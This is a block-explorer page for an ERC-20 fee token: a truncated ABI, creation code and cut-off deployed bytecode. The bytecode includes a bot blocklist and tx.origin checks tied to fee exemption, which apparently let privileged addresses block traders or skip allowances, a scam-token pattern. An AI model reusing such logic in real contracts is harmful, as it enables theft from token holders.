],"name":"_marketingWallet8BIT41VQD","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyBurnAFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyLiquidityAFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyMarketingAFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTotalAFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"launch","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellBurnAFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellLiquidityAFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellMarketingAFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellTotalAFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForLiquidity","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForMarketing","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_token","type":"address"},{"internalType":"address","name":"_to","type":"address"}],"name":"transferForeignToken","outputs":[{"internalType":"bool","name":"_sent","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]Contract Creation Code
600c805461ffff19169055600760c0908152663862697420414960c81b60e0526101406040526004610100908152630e10925560e21b61012052600361004583826106d2565b50600461005282826106d2565b5050505f61006461043d60201b60201c565b600680546001600160a01b0319166001600160a01b038316908117909155604051919250905f907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a350737a250d5630b4cf539739df2c5dacb4c659f2488d5f819052601d60209081527f8103d83ffc7442b4d4b2de196808679d4cd54aa09ff1c14c4990815f34df37b8805460ff1916600117905560808290526040805163c45a015560e01b81529051839263c45a015592600480820193918290030181865afa158015610138573d5f5f3e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061015c919061078c565b6001600160a01b031663c9c6539630836001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156101a7573d5f5f3e3d5ffd5b505050506040513d601f19601f820116820180604052508101906101cb919061078c565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af1158015610215573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610239919061078c565b6001600160a01b031660a08190525f908152601d60205260409020805460ff1916600117905560a05161026d906001610441565b5f80808080806011600c670de0b6b3a76400006103e861028d82826107c6565b61029791906107dd565b6009556103e86102a782826107c6565b6102b191906107dd565b600b556127106102c282600a6107c6565b6102cc91906107dd565b600a556102da8960026107c6565b60118190556012899055601388905587906102f6908a906107fc565b610300919061080f565b6010556015869055601685905560178490558361031e8660026107c6565b60155461032b91906107fc565b610335919061080f565b601455601a80546001600160a01b0319163317905561036661035f6006546001600160a01b031690565b6001610494565b610371306001610494565b601a54610388906001600160a01b03166001610494565b6103c061039d6006546001600160a01b031690565b6001600160a01b03165f908152601d60205260409020805460ff19166001179055565b305f908152601d60205260409020805460ff19166001179055601a546001600160a01b03165f908152601d60205260409020805460ff1916600117905561041d33606461040e8460026107c6565b61041891906107dd565b6104f2565b61042e30606461040e8460626107c6565b50505050505050505050610822565b3390565b6001600160a01b0382165f818152601e6020526040808220805460ff191685151590811790915590519092917fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab91a35050565b6001600160a01b0382165f818152601c6020908152604091829020805460ff191685151590811790915591519182527f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df7910160405180910390a25050565b6001600160a01b03821661054d5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f20616464726573730060448201526064015b60405180910390fd5b60025461055a90826105d3565b6002556001600160a01b0382165f9081526020819052604090205461057f90826105d3565b6001600160a01b0383165f81815260208181526040808320949094559251848152919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b5f806105df83856107fc565b9050838110156106315760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610544565b90505b92915050565b634e487b7160e01b5f52604160045260245ffd5b600181811c9082168061066257607f821691505b60208210810361068057634e487b7160e01b5f52602260045260245ffd5b50919050565b601f8211156106cd57805f5260205f20601f840160051c810160208510156106ab5750805b601f840160051c820191505b818110156106ca575f81556001016106b7565b50505b505050565b81516001600160401b038111156106eb576106eb61063a565b6106ff816106f9845461064e565b84610686565b6020601f821160018114610731575f831561071a5750848201515b5f19600385901b1c1916600184901b1784556106ca565b5f84815260208120601f198516915b828110156107605787850151825560209485019460019092019101610740565b508482101561077d57868401515f19600387901b60f8161c191681555b50505050600190811b01905550565b5f6020828403121561079c575f5ffd5b81516001600160a01b0381168114610631575f5ffd5b634e487b7160e01b5f52601160045260245ffd5b8082028115828204841417610634576106346107b2565b5f826107f757634e487b7160e01b5f52601260045260245ffd5b500490565b80820180821115610634576106346107b2565b81810381811115610634576106346107b2565b60805160a0516121e661086d5f395f818161049b0152610ed001525f818161034901528181610c7001528181610ccc01528181611bcc01528181611c830152611cbf01526121e65ff3fe608060405260043610610236575f3560e01c80634fbee19311610129578063a9059cbb116100a8578063dd62ed3e1161006d578063dd62ed3e1461068d578063e152d94e146106d1578063e2f45605146106e6578063f2fde38b146106fb578063f8b45b051461071a575f5ffd5b8063a9059cbb146105f3578063b62496f514610612578063bbc0c74214610640578063c8c8ebe414610659578063ca1915ab1461066e575f5ffd5b80638366e79a116100ee5780638366e79a1461056f57806384a62e611461058e5780638da5cb5b146105a357806395d89b41146105c0578063a457c2d7146105d4575f5ffd5b80634fbee193146104bd5780636ddd1713146104f457806370a0823114610512578063715018a6146105465780637231c0311461055a575f5ffd5b806318daa526116101b557806323b872dd1161017a57806323b872dd1461041c578063313ce5671461043b57806339509351146104565780634451f5c01461047557806349bd5a5e1461048a575f5ffd5b806318daa526146103a95780631a8145bb146103be5780631e465b6a146103d35780631f3fed8f146103f25780631f53f29d14610407575f5ffd5b8063150b55da116101fb578063150b55da146103015780631694505e1461033857806317b657d61461036b57806318160ddd146103805780631839528214610394575f5ffd5b806301339c211461024157806306fdde0314610257578063095ea7b31461028157806310d5de53146102b057806314b85288146102de575f5ffd5b3661023d57005b5f5ffd5b34801561024c575f5ffd5b5061025561072f565b005b348015610262575f5ffd5b5061026b61078c565b6040516102789190611d74565b60405180910390f35b34801561028c575f5ffd5b506102a061029b366004611dc0565b61081c565b6040519015158152602001610278565b3480156102bb575f5ffd5b506102a06102ca366004611dea565b601d6020525f908152604090205460ff1681565b3480156102e9575f5ffd5b506102f360135481565b604051908152602001610278565b34801561030c575f5ffd5b50600e54610320906001600160a01b031681565b6040516001600160a01b039091168152602001610278565b348015610343575f5ffd5b506103207f000000000000000000000000000000000000000000000000000000000000000081565b348015610376575f5ffd5b506102f3600d5481565b34801561038b575f5ffd5b506002546102f3565b34801561039f575f5ffd5b506102f360175481565b3480156103b4575f5ffd5b506102f360165481565b3480156103c9575f5ffd5b506102f360195481565b3480156103de575f5ffd5b50601a54610320906001600160a01b031681565b3480156103fd575f5ffd5b506102f360185481565b348015610412575f5ffd5b506102f360155481565b348015610427575f5ffd5b506102a0610436366004611e05565b610832565b348015610446575f5ffd5b5060405160098152602001610278565b348015610461575f5ffd5b506102a0610470366004611dc0565b6108bf565b348015610480575f5ffd5b506102f360125481565b348015610495575f5ffd5b506103207f000000000000000000000000000000000000000000000000000000000000000081565b3480156104c8575f5ffd5b506102a06104d7366004611dea565b6001600160a01b03165f908152601c602052604090205460ff1690565b3480156104ff575f5ffd5b50600c546102a090610100900460ff1681565b34801561051d575f5ffd5b506102f361052c366004611dea565b6001600160a01b03165f9081526020819052604090205490565b348015610551575f5ffd5b506102556108f9565b348015610565575f5ffd5b506102f360115481565b34801561057a575f5ffd5b506102a0610589366004611e43565b61096c565b348015610599575f5ffd5b506102f360145481565b3480156105ae575f5ffd5b506006546001600160a01b0316610320565b3480156105cb575f5ffd5b5061026b610b18565b3480156105df575f5ffd5b506102a06105ee366004611dc0565b610b27565b3480156105fe575f5ffd5b506102a061060d366004611dc0565b610b74565b34801561061d575f5ffd5b506102a061062c366004611dea565b601e6020525f908152604090205460ff1681565b34801561064b575f5ffd5b50600c546102a09060ff1681565b348015610664575f5ffd5b506102f360095481565b348015610679575f5ffd5b50600f54610320906001600160a01b031681565b348015610698575f5ffd5b506102f36106a7366004611e43565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b3480156106dc575f5ffd5b506102f360105481565b3480156106f1575f5ffd5b506102f3600a5481565b348015610706575f5ffd5b50610255610715366004611dea565b610b80565b348015610725575f5ffd5b506102f3600b5481565b6006546001600160a01b031633146107625760405162461bcd60e51b815260040161075990611e7a565b60405180910390fd5b305f9081526020819052604090205461077b9047610c6a565b600c805461ffff1916610101179055565b60606003805461079b90611eaf565b80601f01602080910402602001604051908101604052809291908181526020018280546107c790611eaf565b80156108125780601f106107e957610100808354040283529160200191610812565b820191905f5260205f20905b8154815290600101906020018083116107f557829003601f168201915b5050505050905090565b5f610828338484610d48565b5060015b92915050565b5f61083e848484610df5565b6001600160a01b038481165f81815260016020908152604082203390925252908416148015906108ae57506108ae843360055461087b9086611efb565b6001600160a01b0388165f9081526001602090815260408083203384529091529020546108a89190611f12565b876115ee565b806108b7575060015b949350505050565b335f8181526001602090815260408083206001600160a01b038716845290915281205490916108289185906108f4908661169e565b610d48565b6006546001600160a01b031633146109235760405162461bcd60e51b815260040161075990611e7a565b6006546040515f916001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600680546001600160a01b0319169055565b6006545f906001600160a01b031633146109985760405162461bcd60e51b815260040161075990611e7a565b306001600160a01b038416036109f05760405162461bcd60e51b815260206004820152601c60248201527f43616e2774207769746864726177206e617469766520746f6b656e73000000006044820152606401610759565b6040516370a0823160e01b81523060048201525f906001600160a01b038516906370a0823190602401602060405180830381865afa158015610a34573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610a589190611f25565b60405163a9059cbb60e01b81526001600160a01b038581166004830152602482018390529192509085169063a9059cbb906044016020604051808303815f875af1158015610aa8573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610acc9190611f3c565b604080516001600160a01b0387168152602081018490529193507fdeda980967fcead7b61e78ac46a4da14274af29e894d4d61e8b81ec38ab3e438910160405180910390a15092915050565b60606004805461079b90611eaf565b5f61082833846108f48560405180606001604052806025815260200161218c60259139335f9081526001602090815260408083206001600160a01b038d1684529091529020549190611703565b5f610828338484610df5565b6006546001600160a01b03163314610baa5760405162461bcd60e51b815260040161075990611e7a565b6001600160a01b038116610c0f5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610759565b6006546040516001600160a01b038084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a3600680546001600160a01b0319166001600160a01b0392909216919091179055565b610c95307f000000000000000000000000000000000000000000000000000000000000000084610d48565b60405163f305d71960e01b8152306004820152602481018390525f60448201819052606482015261dead60848201524260a48201527f00000000000000000000000000000000000000000000000000000000000000006001600160a01b03169063f305d71990839060c40160606040518083038185885af1158015610d1c573d5f5f3e3d5ffd5b50505050506040513d601f19601f82011682018060405250810190610d419190611f5b565b5050505050565b6001600160a01b038316610d6e5760405162461bcd60e51b815260040161075990611f86565b6001600160a01b038216610d945760405162461bcd60e51b815260040161075990611fca565b6001600160a01b038381165f8181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b038316610e1b5760405162461bcd60e51b81526004016107599061200c565b6001600160a01b038216610e415760405162461bcd60e51b815260040161075990612051565b805f03610e5857610e5383835f61173b565b505050565b6001600160a01b0383165f9081526007602052604090205460ff1615610eb55760405162461bcd60e51b8152602060048201526012602482015271109bdd081a5cc81b9bdd08185b1b1bddd95960721b6044820152606401610759565b325f908152601c602052604090205460ff168015610f0557507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316836001600160a01b031614155b8015610f1b57506001600160a01b03821661dead145b8015610f5457506402540be40081610f47856001600160a01b03165f9081526020819052604090205490565b610f519190611f12565b11155b15610f88576001600160a01b0383165f908152600760205260408120805460ff19166001179055610e53908490849061173b565b6006546001600160a01b03848116911614801590610fb457506006546001600160a01b03838116911614155b8015610fc857506001600160a01b03821615155b8015610fdf57506001600160a01b03821661dead14155b8015610fee575060085460ff16155b156112de57600c5460ff1661107f576001600160a01b0383165f908152601c602052604090205460ff168061103a57506001600160a01b0382165f908152601c602052604090205460ff165b61107f5760405162461bcd60e51b81526020600482015260166024820152752a3930b234b7339034b9903737ba1030b1ba34bb329760511b6044820152606401610759565b6001600160a01b0383165f908152601e602052604090205460ff1680156110be57506001600160a01b0382165f908152601d602052604090205460ff16155b156111a1576009548111156111335760405162461bcd60e51b815260206004820152603560248201527f427579207472616e7366657220616d6f756e742065786365656473207468652060448201527436b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760591b6064820152608401610759565b600b546001600160a01b0383165f908152602081905260409020546111589083612094565b111561119c5760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b6044820152606401610759565b6112de565b6001600160a01b0382165f908152601e602052604090205460ff1680156111e057506001600160a01b0383165f908152601d602052604090205460ff16155b156112565760095481111561119c5760405162461bcd60e51b815260206004820152603660248201527f53656c6c207472616e7366657220616d6f756e742065786365656473207468656044820152751036b0bc2a3930b739b0b1ba34b7b720b6b7bab73a1760511b6064820152608401610759565b6001600160a01b0382165f908152601d602052604090205460ff166112de57600b546001600160a01b0383165f9081526020819052604090205461129a9083612094565b11156112de5760405162461bcd60e51b815260206004820152601360248201527213585e081dd85b1b195d08195e18d959591959606a1b6044820152606401610759565b305f90815260208190526040812054600a54909190821080159190829061130c5750600c54610100900460ff165b801561131b575060085460ff16155b801561133f57506001600160a01b0386165f908152601e602052604090205460ff16155b801561136357506001600160a01b0386165f908152601c602052604090205460ff16155b801561138757506001600160a01b0385165f908152601c602052604090205460ff16155b156113ac576008805460ff191660011790556113a1611864565b6008805460ff191690555b6008546001600160a01b0387165f908152601c602052604090205460ff918216159116806113f157506001600160a01b0386165f908152601c602052604090205460ff165b156113f957505f5b5f81156115d9576001600160a01b0387165f908152601e602052604090205460ff16801561142857505f601454115b156114d95761144d606461144760145489611a0090919063ffffffff16565b90611a7e565b9050601454601654826114609190611efb565b61146a91906120a7565b60195f82825461147a9190612094565b909155505060145460155461148f9083611efb565b61149991906120a7565b60185f8282546114a99190612094565b90915550506014546017546114be9083611efb565b6114c891906120a7565b6114d29084612094565b92506115a8565b6001600160a01b0388165f908152601e602052604090205460ff16801561150157505f601054115b156115a857611520606461144760105489611a0090919063ffffffff16565b9050601054601254826115339190611efb565b61153d91906120a7565b60195f82825461154d9190612094565b90915550506010546011546115629083611efb565b61156c91906120a7565b60185f82825461157c9190612094565b90915550506010546013546115919083611efb565b61159b91906120a7565b6115a59084612094565b92505b80156115b9576115b988308361173b565b82156115cc576115cc3061dead8561173b565b6115d68187611f12565b95505b6115e488888861173b565b5050505050505050565b5f6001600160a01b0385166116155760405162461bcd60e51b815260040161075990611f86565b6001600160a01b03841661163b5760405162461bcd60e51b815260040161075990611fca565b6001600160a01b038581165f8181526001602090815260408083209489168084529482529182902087905590518681527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3949350505050565b5f806116aa8385612094565b9050838110156116fc5760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610759565b9392505050565b5f81848411156117265760405162461bcd60e51b81526004016107599190611d74565b505f6117328486611f12565b95945050505050565b611746838383611abf565b6001600160a01b03831661176c5760405162461bcd60e51b81526004016107599061200c565b6001600160a01b0382166117925760405162461bcd60e51b815260040161075990612051565b6117ce81604051806060016040528060268152602001612166602691396001600160a01b0386165f908152602081905260409020549190611703565b6001600160a01b038085165f9081526020819052604080822093909355908416815220546117fc908261169e565b6001600160a01b0383165f8181526020819052604090209190915561dead14610e5357816001600160a01b0316836001600160a01b03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051610de891815260200190565b305f9081526020819052604081205490505f6018546019546118869190612094565b90505f821580611894575081155b1561189e57505050565b600a546118ac906014611efb565b8311156118c457600a546118c1906014611efb565b92505b5f600283601954866118d69190611efb565b6118e091906120a7565b6118ea91906120a7565b90505f6118f78583611b36565b90504761190382611b77565b5f61190e4783611b36565b90505f61192a8761144760185485611a0090919063ffffffff16565b90505f6119378284611f12565b5f60198190556018559050851580159061195057505f81115b156119a35761195f8682610c6a565b601954604080518781526020810184905280820192909252517f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb5619181900360600190a15b601a546040516001600160a01b039091169047905f81818185875af1925050503d805f81146119ed576040519150601f19603f3d011682016040523d82523d5f602084013e6119f2565b606091505b505050505050505050505050565b5f825f03611a0f57505f61082c565b5f611a1a8385611efb565b905082611a2785836120a7565b146116fc5760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b6064820152608401610759565b5f6116fc83836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f000000000000815250611d2d565b6001600160a01b038316611ae55760405162461bcd60e51b81526004016107599061200c565b6001600160a01b038216611b0b5760405162461bcd60e51b815260040161075990612051565b325f908152601c6020526040902054610e53908490849060ff16611b2f575f611d59565b5f19611d59565b5f6116fc83836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250611703565b6040805160028082526060820183525f9260208301908036833701905050905030815f81518110611baa57611baa6120c6565b60200260200101906001600160a01b031690816001600160a01b0316815250507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611c26573d5f5f3e3d5ffd5b505050506040513d601f19601f82011682018060405250810190611c4a91906120da565b81600181518110611c5d57611c5d6120c6565b60200260200101906001600160a01b031690816001600160a01b031681525050611ca8307f000000000000000000000000000000000000000000000000000000000000000084610d48565b60405163791ac94760e01b81526001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000169063791ac94790611cfc9085905f908690309042906004016120f5565b5f604051808303815f87803b158015611d13575f5ffd5b505af1158015611d25573d5f5f3e3d5ffd5b505050505050565b5f8183611d4d5760405162461bcd60e51b81526004016107599190611d74565b505f61173284866120a7565b5f8111611d67576001611d69565b5f5b60ff16600555505050565b602081525f82518060208401528060208501604085015e5f604082850101526040601f19601f83011684010191505092915050565b6001600160a01b0381168114611dbd575f5ffd5b50565b5f5f60408385031215611dd1575f5ffd5b8235611ddc81611da9565b946020939093013593505050565b5f60208284031215611dfa575f5ffd5b81356116fc81611da9565b5f5f5f60608486031215611e17575f5ffd5b8335611e2281611da9565b92506020840135611e3281611da9565b929592945050506040919091013590565b5f5f60408385031215611e54575f5ffd5b8235611e5f81611da9565b91506020830135611e6f81611da9565b809150509250929050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b600181811c90821680611ec357607f821691505b602082108103611ee157634e487b7160e01b5f52602260045260245ffd5b50919050565b634e487b7160e01b5f52601160045260245ffd5b808202811582820484141761082c5761082c611ee7565b8181038181111561082c5761082c611ee7565b5f60208284031215611f35575f5ffd5b5051919050565b5f60208284031215611f4c575f5ffd5b815180151581146116fc575f5ffd5b5f5f5f60608486031215611f6d575f5ffd5b5050815160208301516040909301519094929350919050565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b8082018082111561082c5761082c611ee7565b5f826120c157634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f602082840312156120ea575f5ffd5b81516116fc81611da9565b5f60a0820187835286602084015260a0604084015280865180835260c0850191506020880192505f5b818110156121455783516001600160a01b031683526020938401939092019160010161211e565b50506001600160a01b03959095166060840152505060800152939250505056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122098cb03d3638c268cc1d157315d266ed7e52cacff807f6c5599832b4c1aa44b9a64736f6c634300081e0033
Deployed Bytecode
0x608060405260043610610236575f3560e01c80634fbee19311610129578063a9059cbb116100a8578063dd62ed3e1161006d578063dd62ed3e1461068d578063e152d94e146106d1578063e2f45605146106e6578063f2fde38b146106fb578063f8b45b051461071a575f5ffd5b8063a9059cbb146105f3578063b62496f514610612578063bbc0c74214610640578063c8c8ebe414610659578063ca1915ab1461066e575f5ffd5b80638366e79a116100ee5780638366e79a1461056f57806384a62e611461058e5780638da5cb5b146105a357806395d89b41146105c0578063a457c2d7146105d4575f5ffd5b80634fbee193146104bd5780636ddd1713146104f457806370a0823114610512578063715018a6146105465780637231c0311461055a575f5ffd5b806318daa526116101b557806323b872dd1161017a57806323b872dd1461041c578063313ce5671461043b57806339509351146104565780634451f5c01461047557806349bd5a5e1461048a575f5ffd5b806318daa526146103a95780631a8145bb146103be5780631e465b6a146103d35780631f3fed8f146103f25780631f53f29d14610407575f5ffd5b8063150b55da116101fb578063150b55da146103015780631694505e1461033857806317b657d61461036b57806318160ddd146103805780631839528214610394575f5ffd5b806301339c211461024157806306fdde0314610257578063095ea7b31461028157806310d5de53146102b057806314b85288146102de575f5ffd5b3661023d57005b5f5ffd5b34801561024c575f5ffd5b5061025561072f565b005b348015610262575f5ffd5b5061026b61078c565b6040516102789190611d74565b60405180910390f35b34801561028c575f5ffd5b506102a061029b366004611dc0565b61081c565b6040519015158152602001610278565b3480156102bb575f5ffd5b506102a06102ca366004611dea565b601d6020525f908152604090205460ff1681565b3480156102e9575f5ffd5b506102f360135481565b604051908152602001610278565b34801561030c575f5ffd5b50600e54610320906001600160a01b031681565b6040516001600160a01b039091168152602001610278565b348015610343575f5ffd5b506103207f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b348015610376575f5ffd5b506102f3600d5481565b34801561038b575f5ffd5b506002546102f3565b34801561039f575f5ffd5b506102f360175481565b3480156103b4575f5ffd5b506102f360165481565b3480156103c9575f5ffd5b506102f360195481565b3480156103de575f5ffd5b50601a54610320906001600160a01b031681565b3480156103fd575f5ffd5b506102f360185481565b348015610412575f5ffd5b506102f360155481565b348015610427575f5ffd5b506102a0610436366004611e05565b610832565b348015610446575f5ffd5b5060405160098152602001610278565b348015610461575f5ffd5b506102a0610470366004611dc0565b6108bf565b348015610480575f5ffd5b506102f360125481565b348015610495575f5ffd5b506103207f0000000000000000000000002a0d96ffccde2c64dabf4997cb641e5f352869bb81565b3480156104c8575f5ffd5b506102a06104d7366004611dea565b6001600160a01b03165f908152601c602052604090205460ff1690565b3480156104ff575f5ffd5b50600c546102a090610100900460ff1681565b34801561051d575f5ffd5b506102f361052c366004611dea565b6001600160a01b03165f9081526020819052604090205490565b348015610551575f5ffd5b506102556108f9565b348015610565575f5ffd5b506102f360115481565b34801561057a575f5ffd5b506102a0610589366004611e43565b61096c565b348015610599575f5ffd5b506102f360145481565b3480156105ae575f5ffd5b506006546001600160a01b0316610320565b3480156105cb575f5ffd5b5061026b610b18565b3480156105df575f5ffd5b506102a06105ee366004611dc0565b610b27565b3480156105fe575f5ffd5b506102a061060d366004611dc0565b610b74565b34801561061d575f5ffd5b506102a061062c366004611dea565b601e6020525f908152604090205460ff1681565b34801561064b575f5ffd5b50600c546102a09060ff1681565b348015610664575f5ffd5b506102f360095481565b348015610679575f5ffd5b50600f54610320906001600160a01b031681565b348015610698575f5ffd5b506102f36106a7366004611e43565b6001600160a01b039182165f90815260016020908152604080832093909416825291909152205490565b3480156106dc575f5ffd5b506102f360105481565b3480156106f1575f5ffd5b506102f3600a5481565b348015610706575f5ffd5b50610255610715366004611dea565b610b80565b348015610725575f5ffd5b506102f3600b5481565b6006546001600160a01b031633146107625760405162461bcd60e51b815260040161075990611e7a565b60405180910390fd5b305f9081526020819052604090205461077b9047610c6a565b600c805461ffff1916610101179055565b60606003805461079b90611eaf565b80601f01602080910402602001604051908101604052809291908181526020018280546107c790611eaf565b80156108125780601f106107e957610100808354040283529160200191610812565b820191905f5260205f20905b8154815290600101906020018083116107f557829003601f168201915b5050505050905090565b5f610828338484610d48565b5060015b92915050565b5f61083e848484610df5565b6001600160a01b038481165f81815260016020908152604082203390925252908416148015906108ae57506108ae843360055461087b9086611efb565b6001600160a01b0388165f9081526001602090815260408083203384529091529020546108a89190611f12565b876115ee565b806108b7575060015b949350505050565b335f8181526001602090815260408083206001600160a01b038716845290915281205490916108289185906108f4908661169e565b610d48565b6006546001600160a01b031633146109235760405162461bcd60e51b815260040161075990611e7a565b6006546040515f916001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600680546001600160a01b0319169055565b6006545f906001600160a01b031633146109985760405162461bcd60e51b815260040161075990611e7a565b306001600160a01b038416036109f